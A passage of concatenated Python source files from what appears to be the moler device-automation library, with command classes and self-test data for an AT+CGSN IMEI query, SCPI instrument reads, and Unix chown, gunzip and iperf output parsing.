1 returns the IMEI (International Mobile station Equipment Identity)
2 returns the IMEISV (International Mobile station Equipment Identity and Software Version number)
3 returns the SVN (Software Version Number)
:param sn_type: "default", "imei", "imeisv", "svn"
"""
super(GetImei, self).__init__(connection, operation='execute', prompt=prompt,
newline_chars=newline_chars, runner=runner)
self.sn_type = sn_type
_serial_variants = {"default": "AT+CGSN",
"imei": "AT+CGSN=1",
"imeisv": "AT+CGSN=1",
"svn": "AT+CGSN=2"}
def build_command_string(self):
cmd = self._serial_variants[self.sn_type]
return cmd
def on_new_line(self, line, is_full_line):
"""
Method to parse command output. Will be called after line with command echo.
490154203237518
or
+CGSN: "490154203237518"
OK
Write your own implementation but don't forget to call on_new_line from base class
:param line: Line to parse, new lines are trimmed
:param is_full_line: False for chunk of line; True on full line (NOTE: new line character removed)
:return: None
"""
if is_full_line:
try:
self._parse_imei(line)
except ParsingDone:
pass
return super(GetImei, self).on_new_line(line, is_full_line)
_re_sn = re.compile(r'^\s*(?P<sn>\S.*)\s*$')
_re_imei = re.compile(r'^\s*\+CGSN: "(?P<tac>\d{8})(?P<snr>\d{6})(?P<cd>\d{1})"\s*$') # taken from standard
_re_imeisv = re.compile(r'(?P<tac>\d{8})(?P<snr>\d{6})(?P<svn>\d{2})') # TODO: need real output example
_re_svn = re.compile(r'(?P<svn>\d{2})') # TODO: need real output example
def _parse_imei(self, line):
"""
Parse serial_number identification that may look like:
490154203237518
or
+CGSN: "490154203237518"
"""
if self.sn_type == 'default':
if self._regex_helper.match_compiled(self._re_sn, line):
sn = self._regex_helper.group("sn")
self.current_ret['imei'] = sn
raise ParsingDone
elif self.sn_type == 'imei':
if self._regex_helper.match_compiled(self._re_imei, line):
imei_parts = self._regex_helper.groupdict()
self.current_ret.update(imei_parts)
self.current_ret["imei"] = "{}{}{}".format(imei_parts["tac"], imei_parts["snr"], imei_parts["cd"])
raise ParsingDone
# TODO: 'imeisv' and 'svn' taken from latest AT standard; need real life examples to put into COMMAND_OUTPUT
#
# elif self.sn_type == 'imeisv':
# if self._regex_helper.match_compiled(self._re_imeisv, line):
# imei_parts = self._regex_helper.groupdict()
# self.current_ret.update(imei_parts)
# self.current_ret["imeisv"] = "{}{}{}".format(imei_parts["tac"], imei_parts["snr"], imei_parts["svn"])
# raise ParsingDone
#
# elif self.sn_type == 'svn':
# if self._regex_helper.match_compiled(self._re_svn, line):
# svn = self._regex_helper.group("svn")
# self.current_ret["svn"] = svn
# raise ParsingDone
def is_end_of_cmd_output(self, line):
"""
Checks if end of command is reached.
        AT+CGSN and AT+CGSN=0 are not terminated by OK, so such a command is finished when the serial number is detected.
        :param line: Line from device.
        :return: True if end of command output is reached, False otherwise.
"""
if self.sn_type == 'default':
return 'imei' in self.current_ret
return super(GetImei, self).is_end_of_cmd_output(line)
# -----------------------------------------------------------------------------
# Following documentation is required for library CI.
# It is used to perform command self-test.
#
# Moreover, it documents what will be COMMAND_RESULT when command
# is run with COMMAND_KWARGS on COMMAND_OUTPUT data coming from connection.
#
# When you need to show parsing of multiple outputs just add suffixes:
# COMMAND_OUTPUT_suffix
# COMMAND_KWARGS_suffix
# COMMAND_RESULT_suffix
# -----------------------------------------------------------------------------
COMMAND_OUTPUT_ver_default = """
AT+CGSN
490154203237518
"""
COMMAND_KWARGS_ver_default = {}
COMMAND_RESULT_ver_default = {
'imei': '490154203237518'
}
# -----------------------------------------------------------------------------
COMMAND_OUTPUT_ver_imei = '''
AT+CGSN=1
+CGSN: "490154203237518"
OK
'''
COMMAND_KWARGS_ver_imei = {'sn_type': 'imei'}
COMMAND_RESULT_ver_imei = {
'imei': '490154203237518',
'tac': '49015420',
'snr': '323751',
'cd': '8',
}
# -----------------------------------------------------------------------------
```
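The snippet below (standalone, illustrative) applies the same `_re_imei` pattern to the quoted IMEI from `COMMAND_OUTPUT_ver_imei` to show how it is split into TAC/SNR/CD and re-joined into the `imei` result.
```python
import re

# Same pattern as GetImei._re_imei above.
_re_imei = re.compile(r'^\s*\+CGSN: "(?P<tac>\d{8})(?P<snr>\d{6})(?P<cd>\d{1})"\s*$')

match = _re_imei.match('+CGSN: "490154203237518"')
parts = match.groupdict()
print(parts)  # {'tac': '49015420', 'snr': '323751', 'cd': '8'}
print("{tac}{snr}{cd}".format(**parts))  # 490154203237518 - matches COMMAND_RESULT_ver_imei
```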
#### File: cmd/juniper/genericjuniper.py
```python
from moler.cmd.commandtextualgeneric import CommandTextualGeneric
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2019, Nokia'
__email__ = '<EMAIL>'
class GenericJuniperCommand(CommandTextualGeneric):
"""Genericjunipercommand command class."""
def __init__(self, connection, prompt=None, newline_chars=None, runner=None):
"""
Genericjunipercommand command.
:param connection: moler connection to device, terminal when command is executed.
        :param prompt: expected prompt sent by device after command execution
:param newline_chars: Characters to split lines
:param runner: Runner to run command
"""
super(GenericJuniperCommand, self).__init__(connection, prompt=prompt, newline_chars=newline_chars,
runner=runner)
```
#### File: cmd/pdu_aten/generic_pdu_aten.py
```python
import six
import abc
from moler.cmd.commandtextualgeneric import CommandTextualGeneric
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
@six.add_metaclass(abc.ABCMeta)
class GenericPduAten(CommandTextualGeneric):
def __init__(self, connection, prompt=None, newline_chars=None, runner=None):
"""
Base class for Aten PDU commands in all states.
:param connection: connection to device.
        :param prompt: expected prompt sent by device after command execution. May be a String or compiled re.
:param runner: runner to run command.
"""
super(GenericPduAten, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars,
runner=runner)
```
#### File: scpi/scpi/idn.py
```python
from moler.cmd.scpi.scpi.genericscpistate import GenericScpiState
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2019, Nokia'
__email__ = '<EMAIL>'
class Idn(GenericScpiState):
def __init__(self, connection, prompt=None, newline_chars=None, runner=None):
"""
Class for command IDN for SCPI device.
:param connection: connection to device.
        :param prompt: expected prompt sent by device after command execution. May be a String or compiled re.
:param newline_chars: new line chars on device (a list).
:param runner: runner to run command.
"""
super(Idn, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars,
runner=runner)
self.current_ret['RAW_OUTPUT'] = list()
def build_command_string(self):
return "*idn?"
def on_new_line(self, line, is_full_line):
if is_full_line:
self.current_ret['RAW_OUTPUT'].append(line)
return super(Idn, self).on_new_line(line=line, is_full_line=is_full_line)
COMMAND_OUTPUT = """*idn?
Agilent Technologies,N9020A,MY53420262,A.13.15
SCPI>"""
COMMAND_KWARGS = {}
COMMAND_RESULT = {
'RAW_OUTPUT': ['Agilent Technologies,N9020A,MY53420262,A.13.15']
}
```
#### File: scpi/scpi/read.py
```python
import re
from moler.cmd.scpi.scpi.genericscpistate import GenericScpiState
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2019, Nokia'
__email__ = '<EMAIL>'
class Read(GenericScpiState):
def __init__(self, connection, prompt=None, newline_chars=None, runner=None):
"""
Class for command READ for SCPI device.
:param connection: connection to device.
        :param prompt: expected prompt sent by device after command execution. May be a String or compiled re.
:param newline_chars: new line chars on device (a list).
:param runner: runner to run command.
"""
super(Read, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars,
runner=runner)
def build_command_string(self):
return "READ?"
# +8.59803192358089E-005
_re_value = re.compile(r"(?P<VALUE>[+\-]?\d+\.\d+([eE][+\-]\d+))")
def on_new_line(self, line, is_full_line):
if is_full_line:
if self._regex_helper.search_compiled(self._re_value, line):
self.current_ret['VALUE_RAW'] = self._regex_helper.group("VALUE")
self.current_ret['VALUE_FLOAT'] = float(self._regex_helper.group("VALUE"))
super(Read, self).on_new_line(line=line, is_full_line=is_full_line)
COMMAND_OUTPUT = """READ?
+8.59803192358089E-005
SCPI>"""
COMMAND_KWARGS = {}
COMMAND_RESULT = {
"VALUE_RAW": '+8.59803192358089E-005',
"VALUE_FLOAT": 8.59803192358089E-5,
}
```
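As a small illustration of the value parsing in `Read.on_new_line`, the snippet below applies the same `_re_value` pattern to the measurement line from `COMMAND_OUTPUT`.
```python
import re

# Same pattern as Read._re_value above.
_re_value = re.compile(r"(?P<VALUE>[+\-]?\d+\.\d+([eE][+\-]\d+))")

match = _re_value.search("+8.59803192358089E-005")
print(match.group("VALUE"))         # +8.59803192358089E-005
print(float(match.group("VALUE")))  # 8.59803192358089e-05
```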
#### File: cmd/unix/chown.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import re
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import CommandFailure
from moler.exceptions import ParsingDone
class Chown(GenericUnixCommand):
def __init__(self, connection, param, filename, options=None, prompt=None, newline_chars=None, runner=None):
super(Chown, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
self.param = param
self.filename = filename
self.options = options
self.ret_required = False
def build_command_string(self):
if self.options:
cmd = "{} {} {} {}".format("chown", self.options, self.param, self.filename)
else:
cmd = "{} {} {}".format("chown", self.param, self.filename)
return cmd
def on_new_line(self, line, is_full_line):
if is_full_line:
try:
self._parse_error(line)
except ParsingDone:
pass
return super(Chown, self).on_new_line(line, is_full_line)
_reg_fail = re.compile(
r'chown: missing operand after\s(?P<FILENAME>.*)'
r'|chown: cannot access (?P<FILENAME1>.*):\s*(?P<ERROR>.*)'
r'|chown: changing ownership of (?P<FILENAME2>.*):\s*(?P<ERROR1>.*)')
def _parse_error(self, line):
if self._regex_helper.search(Chown._reg_fail, line):
            self.set_exception(CommandFailure(self, "ERROR: {} or {}".format(self._regex_helper.group("ERROR"),
                                                                             self._regex_helper.group("ERROR1"))))
raise ParsingDone
COMMAND_OUTPUT_change_user_execute = """
ute@debdev:~$ chown ute /rom/swconfig.txt
ute@debdev:~$
"""
COMMAND_RESULT_change_user_execute = {
}
COMMAND_KWARGS_change_user_execute = {
"param": "ute",
"filename": "/rom/swconfig.txt",
}
COMMAND_OUTPUT_change_user_and_group_execute = """
ute@debdev:~$ chown ute:ute /rom/swconfig1.txt
ute@debdev:~$ """
COMMAND_RESULT_change_user_and_group_execute = {
}
COMMAND_KWARGS_change_user_and_group_execute = {
"param": "ute:ute",
"filename": "/rom/swconfig1.txt",
}
COMMAND_OUTPUT_change_user_with_option_execute = """
ute@debdev:~$ chown -R ute /rom/swconfig
ute@debdev:~$ """
COMMAND_RESULT_change_user_with_option_execute = {
}
COMMAND_KWARGS_change_user_with_option_execute = {
"options": "-R",
"param": "ute",
"filename": "/rom/swconfig",
}
```
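To illustrate what `_parse_error` reacts to, the standalone snippet below runs the same failure regex against a typical chown error line (the sample line itself is illustrative).
```python
import re

# Same pattern as Chown._reg_fail above.
_reg_fail = re.compile(
    r'chown: missing operand after\s(?P<FILENAME>.*)'
    r'|chown: cannot access (?P<FILENAME1>.*):\s*(?P<ERROR>.*)'
    r'|chown: changing ownership of (?P<FILENAME2>.*):\s*(?P<ERROR1>.*)')

line = "chown: cannot access 'missing.txt': No such file or directory"
match = _reg_fail.search(line)
print(match.group("FILENAME1"))  # 'missing.txt'
print(match.group("ERROR"))      # No such file or directory
```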
#### File: cmd/unix/gunzip.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import CommandFailure
from moler.exceptions import ParsingDone
import re
class Gunzip(GenericUnixCommand):
def __init__(self, connection, archive_name, output_file_name=None, options=None, overwrite=False,
prompt=None, newline_chars=None, runner=None):
super(Gunzip, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
self.archive_name = archive_name
self.output_file_name = output_file_name
self.options = options
self.overwrite = overwrite
self.keys = list()
self.current_ret['RESULT'] = list()
# private variables
self._answered_file = None
self._asks_to_overwrite_send = False
def build_command_string(self):
cmd = 'gunzip'
if self.options:
cmd = '{} {}'.format(cmd, self.options)
if self.archive_name:
for file in self.archive_name:
cmd = '{} {}'.format(cmd, file)
if self.output_file_name:
cmd = '{} > {}'.format(cmd, self.output_file_name)
return cmd
def on_new_line(self, line, is_full_line):
try:
self._parse_info_output(line)
self._asks_to_overwrite(line)
self._create_dictionary_at_l_option(line)
self._command_failure(line)
except ParsingDone:
pass
return super(Gunzip, self).on_new_line(line, is_full_line)
_re_info_output = re.compile(r" -- replaced with")
def _parse_info_output(self, line):
if self._regex_helper.search_compiled(Gunzip._re_info_output, line):
self.current_ret['RESULT'].append(line)
raise ParsingDone
_re_overwrite = re.compile(r"gzip:\s+(?P<FILE_NAME>.*)\s+already exists", re.IGNORECASE)
def _asks_to_overwrite(self, line):
if self._regex_helper.search_compiled(Gunzip._re_overwrite, line):
current_file = self._regex_helper.group("FILE_NAME")
if current_file != self._answered_file:
if self.overwrite:
self.connection.sendline('y')
else:
self.connection.sendline('n')
self.set_exception(CommandFailure(self, "ERROR: {} already exists".format(current_file)))
self._answered_file = current_file
raise ParsingDone
_re_l_option = re.compile(r"(?P<L_OPTION> compressed\s*uncompressed\s*ratio\s*uncompressed_name.*)", re.IGNORECASE)
def _create_dictionary_at_l_option(self, line):
if self.keys and not self.current_ret['RESULT']:
self.values = line.strip().split()
if 'date' in self.keys:
self.values = self.values[:2] + ['{} {}'.format(self.values[2], self.values[3])] + self.values[4:]
self.current_ret['RESULT'].append(dict(zip(self.keys, self.values)))
raise ParsingDone
if self._regex_helper.search_compiled(Gunzip._re_l_option, line):
self.keys = line.strip().split()
raise ParsingDone
_re_error = re.compile(r"gzip:\s(?P<ERROR_MSG>.*)", re.IGNORECASE)
def _command_failure(self, line):
if self._regex_helper.search_compiled(Gunzip._re_error, line):
self.set_exception(CommandFailure(self, "ERROR: {}".format(self._regex_helper.group("ERROR_MSG"))))
raise ParsingDone
COMMAND_OUTPUT_without_options = """
xyz@debian:~$ gunzip new.gz
xyz@debian:~$"""
COMMAND_KWARGS_without_options = {
'archive_name': ['new.gz']
}
COMMAND_RESULT_without_options = {
'RESULT': []
}
COMMAND_OUTPUT_loud_options = """
xyz@debian:~$ gunzip -v new.gz
new.gz: -7.7% -- replaced with new
xyz@debian:~$"""
COMMAND_KWARGS_loud_options = {
'archive_name': ['new.gz'],
'options': '-v'
}
COMMAND_RESULT_loud_options = {
'RESULT': ['new.gz:\t -7.7% -- replaced with new']
}
COMMAND_OUTPUT_overwrite = """
xyz@debian:~$ gunzip new.gz
gzip: new already exists; do you wish to overwrite (y or n)? xyz@debian:~$"""
COMMAND_KWARGS_overwrite = {
'archive_name': ['new.gz'],
    'overwrite': True
}
COMMAND_RESULT_overwrite = {
'RESULT': []
}
COMMAND_OUTPUT_send_to_another_directory = """
xyz@debian:~$ gunzip afile.gz > sed/afile
xyz@debian:~$"""
COMMAND_KWARGS_send_to_another_directory = {
'archive_name': ['afile.gz'],
'output_file_name': 'sed/afile'
}
COMMAND_RESULT_send_to_another_directory = {
'RESULT': []
}
COMMAND_OUTPUT_on_l_option = """
xyz@debian:~$ gunzip -l afile.gz
compressed uncompressed ratio uncompressed_name
26 0 0.0% afile
xyz@debian:~$"""
COMMAND_KWARGS_on_l_option = {
'archive_name': ['afile.gz'],
'options': '-l'
}
COMMAND_RESULT_on_l_option = {
'RESULT': [{'compressed': '26', 'uncompressed': '0', 'ratio': '0.0%', 'uncompressed_name': 'afile'}]
}
COMMAND_OUTPUT_on_vl_option = """
xyz@debian:~$ gunzip -vl afile.gz
method crc date time compressed uncompressed ratio uncompressed_name
defla 00000000 Aug 9 12:27 26 0 0.0% afile
xyz@debian:~$"""
COMMAND_KWARGS_on_vl_option = {
'archive_name': ['afile.gz'],
'options': '-vl'
}
COMMAND_RESULT_on_vl_option = {
'RESULT': [{'method': 'defla', 'crc': '00000000', 'date': 'Aug 9', 'time': '12:27', 'compressed': '26',
'uncompressed': '0', 'ratio': '0.0%', 'uncompressed_name': 'afile'}]
}
```
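The header/value pairing done by `_create_dictionary_at_l_option` (including the re-join of the two date tokens) can be seen in isolation with the sketch below, fed with the `-vl` sample from `COMMAND_OUTPUT_on_vl_option`.
```python
# Standalone sketch of the -l/-vl parsing used by Gunzip above.
header = "method  crc     date  time           compressed        uncompressed  ratio uncompressed_name"
values = "defla 00000000 Aug 9 12:27                  26                   0   0.0% afile"

keys = header.strip().split()
vals = values.strip().split()
if 'date' in keys:
    # 'Aug' and '9' split into two tokens but form one logical date field
    vals = vals[:2] + ['{} {}'.format(vals[2], vals[3])] + vals[4:]
print(dict(zip(keys, vals)))
# -> matches COMMAND_RESULT_on_vl_option: {'method': 'defla', 'crc': '00000000',
#    'date': 'Aug 9', 'time': '12:27', 'compressed': '26', 'uncompressed': '0',
#    'ratio': '0.0%', 'uncompressed_name': 'afile'}
```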
#### File: cmd/unix/iperf.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.util.converterhelper import ConverterHelper
from moler.exceptions import CommandFailure
from moler.exceptions import ParsingDone
import re
import warnings
class Iperf(GenericUnixCommand):
"""
Run iperf command and return its statistics
Statistics are given as list of dicts like::
{'Interval': '0.0- 1.0 sec',
'Transfer Raw': '1.17 MBytes',
'Transfer': 1226833,
'Bandwidth Raw': '9.84 Mbits/sec',
'Bandwidth': 1230000,
'Jitter': '1.830 ms',
'Lost_vs_Total_Datagrams': '0/ 837 (0%)'}
Above dict represents iperf output like::
[ ID] Interval Transfer Bandwidth Jitter Lost/Total Datagrams
[904] 0.0- 1.0 sec 1.17 MBytes 9.84 Mbits/sec 1.830 ms 0/ 837 (0%)
Please note that numeric values are normalized to Bytes:
- Transfer is in Bytes
    - Bandwidth is in Bytes/sec
"""
def __init__(self, connection, options, prompt=None, newline_chars=None, runner=None):
super(Iperf, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
self.options = options
self.current_ret['CONNECTIONS'] = dict()
self.current_ret['INFO'] = list()
# private values
self._connection_dict = dict()
self._converter_helper = ConverterHelper()
warnings.warn("Iperf command is deprecated - use Iperf2 instead", DeprecationWarning, stacklevel=2)
def build_command_string(self):
cmd = 'iperf ' + str(self.options)
return cmd
def on_new_line(self, line, is_full_line):
if is_full_line:
try:
self._command_failure(line)
self._parse_connection_name_and_id(line)
self._parse_headers(line)
self._parse_connection_info(line)
self._parse_connection_headers(line)
except ParsingDone:
pass
return super(Iperf, self).on_new_line(line, is_full_line)
_re_command_failure = re.compile(r"(?P<FAILURE_MSG>.*failed.*|.*error.*|.*command not found.*|.*iperf:.*)")
def _command_failure(self, line):
if self._regex_helper.search_compiled(Iperf._re_command_failure, line):
self.set_exception(CommandFailure(self, "ERROR: {}".format(self._regex_helper.group("FAILURE_MSG"))))
raise ParsingDone
# [904] local 10.1.1.1 port 5001 connected with 10.6.2.5 port 32781
_re_connection_name_and_id = re.compile(r"(?P<ID>\[\s*\d*\])\s*(?P<ID_NAME>.*port\s*\d*\s*connected with.*)")
def _parse_connection_name_and_id(self, line):
if self._regex_helper.search_compiled(Iperf._re_connection_name_and_id, line):
connection_id = self._regex_helper.group("ID")
connection_name = self._regex_helper.group("ID_NAME")
connection_dict = {connection_id: connection_name}
self._connection_dict.update(connection_dict)
raise ParsingDone
# iperf output for: udp client, tcp client, tcp server
# [ ID] Interval Transfer Bandwidth
# iperf output for: udp server
# [ ID] Interval Transfer Bandwidth Jitter Lost/Total Datagrams
_re_headers = re.compile(r"\[\s+ID\]\s+Interval\s+Transfer\s+Bandwidth")
def _parse_headers(self, line):
if self._regex_helper.search_compiled(Iperf._re_headers, line):
# ignore headers
raise ParsingDone
# udp:
# [ ID] Interval Transfer Bandwidth Jitter Lost/Total Datagrams
# [ 3] 0.0- 1.0 sec 612 KBytes 5010 Kbits/sec 0.022 ms 0/ 426 (0%)
#
# tcp:
# [ ID] Interval Transfer Bandwidth
# [ 4] 0.0- 1.0 sec 979 KBytes 8020 Kbits/sec
_re_connection_info = re.compile(r"(?P<CONNECTION_ID>\[\s*\d*\])\s*(?P<CONNECTION_REPORT>.*)")
_re_ci = r"(?P<ID>\[\s*\d*\])\s+(?P<Interval>\d+.+sec)\s+(?P<Transfer>[\d\.]+\s+\w+)\s+(?P<Bandwidth>[\d\.]+\s+\w+/sec)"
_re_ci_udp_svr = _re_ci + r"\s+(?P<Jitter>\d+\.\d+\s\w+)\s+(?P<Lost_vs_Total_Datagrams>\d+/\s*\d+\s*\([\d\.]+\%\))"
_re_iperf_record = re.compile(_re_ci)
_re_iperf_record_udp_svr = re.compile(_re_ci_udp_svr)
def _parse_connection_info(self, line):
regex_found = self._regex_helper.search_compiled
if regex_found(Iperf._re_iperf_record_udp_svr, line) or regex_found(Iperf._re_iperf_record, line):
iperf_record = self._regex_helper.groupdict()
connection_id = iperf_record.pop("ID")
connection_name = self._connection_dict[connection_id]
normalized_iperf_record = self._normalize_to_bytes(iperf_record)
self._update_current_ret(connection_name, normalized_iperf_record)
raise ParsingDone
def _update_current_ret(self, connection_name, info_dict):
if connection_name in self.current_ret['CONNECTIONS']:
self.current_ret['CONNECTIONS'][connection_name].append(info_dict)
else:
connection_dict = {connection_name: [info_dict]}
self.current_ret['CONNECTIONS'].update(connection_dict)
# [ 5] Sent 2552 datagrams
# [ 5] Server Report:
# ------------------------------------------------------------
_re_ornaments = re.compile(r"(?P<ORNAMENTS>----*|\[\s*ID\].*)", re.IGNORECASE)
def _parse_connection_headers(self, line):
if not self._regex_helper.search_compiled(Iperf._re_ornaments, line):
self.current_ret['INFO'].append(line.strip())
raise ParsingDone
def _normalize_to_bytes(self, input_dict):
new_dict = {}
for (key, raw_value) in input_dict.items():
if 'Bytes' in raw_value: # iperf MBytes means 1024 * 1024 Bytes - see iperf.fr/iperf-doc.php
new_dict[key + " Raw"] = raw_value
value_in_bytes, _, _ = self._converter_helper.to_bytes(raw_value)
new_dict[key] = value_in_bytes
elif 'bits' in raw_value: # iperf Mbits means 1000 * 1000 bits - see iperf.fr/iperf-doc.php
new_dict[key + " Raw"] = raw_value
value_in_bits, _, _ = self._converter_helper.to_bytes(raw_value, binary_multipliers=False)
value_in_bytes = value_in_bits // 8
new_dict[key] = value_in_bytes
else:
new_dict[key] = raw_value
return new_dict
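# Normalization example (cf. _normalize_to_bytes above and COMMAND_RESULT_basic_client below):
#   '28.6 MBytes'   -> int(28.6 * 1024 * 1024)  = 29989273 Bytes
#   '240 Mbits/sec' -> 240 * 1000 * 1000 // 8   = 30000000 Bytes/sec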
COMMAND_OUTPUT_basic_client = """
xyz@debian:~$ iperf -c 10.1.1.1
------------------------------------------------------------
Client connecting to 10.1.1.1, TCP port 5001
TCP window size: 16384 Byte (default)
------------------------------------------------------------
[ 3] local 192.168.0.102 port 49597 connected with 192.168.0.100 port 5001
[ ID] Interval Transfer Bandwidth
[ 3] 0.0- 1.0 sec 28.6 MBytes 240 Mbits/sec
[ 3] 1.0- 2.0 sec 25.9 MBytes 217 Mbits/sec
[ 3] 2.0- 3.0 sec 26.5 MBytes 222 Mbits/sec
[ 3] 3.0- 4.0 sec 26.6 MBytes 223 Mbits/sec
[ 3] 4.0- 5.0 sec 26.0 MBytes 218 Mbits/sec
[ 3] 5.0- 6.0 sec 26.2 MBytes 220 Mbits/sec
[ 3] 6.0- 7.0 sec 26.8 MBytes 224 Mbits/sec
[ 3] 7.0- 8.0 sec 26.0 MBytes 218 Mbits/sec
[ 3] 8.0- 9.0 sec 25.8 MBytes 216 Mbits/sec
[ 3] 9.0-10.0 sec 26.4 MBytes 221 Mbits/sec
[ 3] 0.0-10.0 sec 265 MBytes 222 Mbits/sec
xyz@debian:~$"""
COMMAND_KWARGS_basic_client = {
'options': '-c 10.1.1.1'
}
COMMAND_RESULT_basic_client = {
'CONNECTIONS':
{'local 192.168.0.102 port 49597 connected with 192.168.0.100 port 5001': [
{'Bandwidth Raw': '240 Mbits/sec', 'Bandwidth': 30000000, 'Transfer Raw': '28.6 MBytes',
'Transfer': 29989273, 'Interval': '0.0- 1.0 sec'},
{'Bandwidth Raw': '217 Mbits/sec', 'Bandwidth': 27125000, 'Transfer Raw': '25.9 MBytes',
'Transfer': 27158118, 'Interval': '1.0- 2.0 sec'},
{'Bandwidth Raw': '222 Mbits/sec', 'Bandwidth': 27750000, 'Transfer Raw': '26.5 MBytes',
'Transfer': 27787264, 'Interval': '2.0- 3.0 sec'},
{'Bandwidth Raw': '223 Mbits/sec', 'Bandwidth': 27875000, 'Transfer Raw': '26.6 MBytes',
'Transfer': 27892121, 'Interval': '3.0- 4.0 sec'},
{'Bandwidth Raw': '218 Mbits/sec', 'Bandwidth': 27250000, 'Transfer Raw': '26.0 MBytes',
'Transfer': 27262976, 'Interval': '4.0- 5.0 sec'},
{'Bandwidth Raw': '220 Mbits/sec', 'Bandwidth': 27500000, 'Transfer Raw': '26.2 MBytes',
'Transfer': 27472691, 'Interval': '5.0- 6.0 sec'},
{'Bandwidth Raw': '224 Mbits/sec', 'Bandwidth': 28000000, 'Transfer Raw': '26.8 MBytes',
'Transfer': 28101836, 'Interval': '6.0- 7.0 sec'},
{'Bandwidth Raw': '218 Mbits/sec', 'Bandwidth': 27250000, 'Transfer Raw': '26.0 MBytes',
'Transfer': 27262976, 'Interval': '7.0- 8.0 sec'},
{'Bandwidth Raw': '216 Mbits/sec', 'Bandwidth': 27000000, 'Transfer Raw': '25.8 MBytes',
'Transfer': 27053260, 'Interval': '8.0- 9.0 sec'},
{'Bandwidth Raw': '221 Mbits/sec', 'Bandwidth': 27625000, 'Transfer Raw': '26.4 MBytes',
'Transfer': 27682406, 'Interval': '9.0-10.0 sec'},
{'Bandwidth Raw': '222 Mbits/sec', 'Bandwidth': 27750000, 'Transfer Raw': '265 MBytes',
'Transfer': 277872640, 'Interval': '0.0-10.0 sec'}]},
'INFO': ['Client connecting to 10.1.1.1, TCP port 5001', 'TCP window size: 16384 Byte (default)']
}
COMMAND_OUTPUT_basic_server = """
xyz@debian:~$ iperf -u
------------------------------------------------------------
Server listening on UDP port 5001
Receiving 1470 byte datagrams
UDP buffer size: 8.00 KByte (default)
------------------------------------------------------------
[904] local 10.1.1.1 port 5001 connected with 10.6.2.5 port 32781
[ ID] Interval Transfer Bandwidth Jitter Lost/Total Datagrams
[904] 0.0- 1.0 sec 1.17 MBytes 9.84 Mbits/sec 1.830 ms 0/ 837 (0%)
[904] 1.0- 2.0 sec 1.18 MBytes 9.94 Mbits/sec 1.846 ms 5/ 850 (0.59%)
[904] 2.0- 3.0 sec 1.19 MBytes 9.98 Mbits/sec 1.802 ms 2/ 851 (0.24%)
[904] 3.0- 4.0 sec 1.19 MBytes 10.0 Mbits/sec 1.830 ms 0/ 850 (0%)
[904] 4.0- 5.0 sec 1.19 MBytes 9.98 Mbits/sec 1.846 ms 1/ 850 (0.12%)
[904] 5.0- 6.0 sec 1.19 MBytes 10.0 Mbits/sec 1.806 ms 0/ 851 (0%)
[904] 6.0- 7.0 sec 1.06 MBytes 8.87 Mbits/sec 1.803 ms 1/ 755 (0.13%)
[904] 7.0- 8.0 sec 1.19 MBytes 10.0 Mbits/sec 1.831 ms 0/ 850 (0%)
[904] 8.0- 9.0 sec 1.19 MBytes 10.0 Mbits/sec 1.841 ms 0/ 850 (0%)
[904] 9.0-10.0 sec 1.19 MBytes 10.0 Mbits/sec 1.801 ms 0/ 851 (0%)
[904] 0.0-10.0 sec 11.8 MBytes 9.86 Mbits/sec 2.618 ms 9/ 8409 (0.11%)
xyz@debian:~$"""
COMMAND_KWARGS_basic_server = {
'options': '-u'
}
COMMAND_RESULT_basic_server = {
'CONNECTIONS': {
'local 10.1.1.1 port 5001 connected with 10.6.2.5 port 32781': [{'Bandwidth Raw': '9.84 Mbits/sec',
'Bandwidth': 1230000,
'Interval': '0.0- 1.0 sec',
'Jitter': '1.830 ms',
'Lost_vs_Total_Datagrams': '0/ 837 (0%)',
'Transfer Raw': '1.17 MBytes',
'Transfer': 1226833},
{'Bandwidth Raw': '9.94 Mbits/sec',
'Bandwidth': 1242500,
'Interval': '1.0- 2.0 sec',
'Jitter': '1.846 ms',
'Lost_vs_Total_Datagrams': '5/ 850 (0.59%)',
'Transfer Raw': '1.18 MBytes',
'Transfer': 1237319},
{'Bandwidth Raw': '9.98 Mbits/sec',
'Bandwidth': 1247500,
'Interval': '2.0- 3.0 sec',
'Jitter': '1.802 ms',
'Lost_vs_Total_Datagrams': '2/ 851 (0.24%)',
'Transfer Raw': '1.19 MBytes',
'Transfer': 1247805},
{'Bandwidth Raw': '10.0 Mbits/sec',
'Bandwidth': 1250000,
'Interval': '3.0- 4.0 sec',
'Jitter': '1.830 ms',
'Lost_vs_Total_Datagrams': '0/ 850 (0%)',
'Transfer Raw': '1.19 MBytes',
'Transfer': 1247805},
{'Bandwidth Raw': '9.98 Mbits/sec',
'Bandwidth': 1247500,
'Interval': '4.0- 5.0 sec',
'Jitter': '1.846 ms',
'Lost_vs_Total_Datagrams': '1/ 850 (0.12%)',
'Transfer Raw': '1.19 MBytes',
'Transfer': 1247805},
{'Bandwidth Raw': '10.0 Mbits/sec',
'Bandwidth': 1250000,
'Interval': '5.0- 6.0 sec',
'Jitter': '1.806 ms',
'Lost_vs_Total_Datagrams': '0/ 851 (0%)',
'Transfer Raw': '1.19 MBytes',
'Transfer': 1247805},
{'Bandwidth Raw': '8.87 Mbits/sec',
'Bandwidth': 1108750,
'Interval': '6.0- 7.0 sec',
'Jitter': '1.803 ms',
'Lost_vs_Total_Datagrams': '1/ 755 (0.13%)',
'Transfer Raw': '1.06 MBytes',
'Transfer': 1111490},
{'Bandwidth Raw': '10.0 Mbits/sec',
'Bandwidth': 1250000,
'Interval': '7.0- 8.0 sec',
'Jitter': '1.831 ms',
